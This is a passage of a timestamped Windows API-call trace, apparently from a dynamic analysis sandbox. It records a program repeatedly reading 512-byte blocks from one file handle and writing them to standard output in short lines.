GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] GetFileType (hFile=0x50) returned 0x1 [0147.692] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.692] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 
[0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.693] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.693] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] GetFileType (hFile=0x50) returned 0x1 [0147.693] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.693] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] GetFileType (hFile=0x50) returned 0x1 [0147.694] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.694] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.695] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.695] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType 
(hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.695] GetFileType (hFile=0x50) returned 0x1 [0147.695] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.696] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.696] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.696] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] GetFileType (hFile=0x50) returned 0x1 [0147.696] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.696] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, 
lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] GetFileType (hFile=0x50) returned 0x1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.697] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.697] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.697] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.697] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 
[0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] GetFileType (hFile=0x50) returned 0x1 [0147.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.698] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, 
lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.699] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.699] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.699] GetFileType (hFile=0x50) returned 0x1 [0147.699] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.700] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.700] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, 
lpOverlapped=0x0) returned 1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.700] GetFileType (hFile=0x50) returned 0x1 [0147.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eaf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaf4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eb44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb44*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22eb94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eb94*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22ebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 
| out: lpBuffer=0x22ebe4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] WriteFile (in: hFile=0x50, lpBuffer=0x22ec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec34*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.701] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22ec84*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22ec84*, lpNumberOfBytesWritten=0x22dc88*=0x20, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.702] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dc74 | out: lpNewFilePointer=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=4) returned 0x58 [0147.702] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] WriteFile (in: hFile=0x50, lpBuffer=0x22eaa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22dc88, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesWritten=0x22dc88*=0x50, lpOverlapped=0x0) returned 1 [0147.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0147.702] GetFileType (hFile=0x50) returned 0x1 [0147.702] _get_osfhandle 
